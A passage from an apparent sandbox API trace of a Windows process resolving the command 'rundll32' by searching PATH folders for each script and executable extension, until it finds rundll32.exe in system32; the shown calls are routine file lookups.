lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.581] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.582] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.582] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.582] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.JS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.js"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.582] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.582] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.582] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.582] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.583] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.583] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.JSE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.jse"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.583] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.583] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.583] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.583] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.584] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.WSF" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.wsf"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.584] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.584] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.584] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.584] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.WSH" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.wsh"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.585] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.585] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.585] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.585] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.585] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.MSC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.msc"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.586] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.586] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.586] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.586] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32.CPL" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32.cpl"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.586] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.586] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.587] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0201.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.587] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0201.587] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\rundll32" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\rundll32"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.587] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0201.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.588] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\rundll32.ps1" (normalized: "c:\\windows\\system32\\rundll32.ps1"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.588] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0201.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.589] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\rundll32.psm1" (normalized: "c:\\windows\\system32\\rundll32.psm1"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.589] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0201.589] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.589] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.589] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\rundll32.psd1" (normalized: "c:\\windows\\system32\\rundll32.psd1"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.590] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0201.590] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.590] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.590] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\rundll32.COM" (normalized: "c:\\windows\\system32\\rundll32.com"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0201.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508dfe0) returned 1 [0201.591] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xafa508e0c0 | out: lpFileInformation=0xafa508e0c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xad951269, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad951269, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0201.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfa0) returned 1 [0201.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e030) returned 1 [0201.591] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xafa508db10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0201.591] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\rundll32.EXE" (normalized: "c:\\windows\\system32\\rundll32.exe"), lpFindFileData=0xafa508dd40 | out: lpFindFileData=0xafa508dd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x243194a3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x243194a3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x243194a3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xe800, dwReserved0=0x0, dwReserved1=0x0, cFileName="rundll32.exe", cAlternateFileName="")) returned 0x2386d70a7f0 [0201.592] FindNextFileW (in: hFindFile=0x2386d70a7f0, lpFindFileData=0xafa508ddd0 | out: lpFindFileData=0xafa508ddd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0201.592] FindClose (in: hFindFile=0x2386d70a7f0 | out: hFindFile=0x2386d70a7f0) returned 1 [0201.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e030) returned 1 [0201.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508dfd0) returned 1 [0201.595] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\rundll32.exe", nBufferLength=0x105, lpBuffer=0xafa508dc10, lpFilePart=0x0 | out: 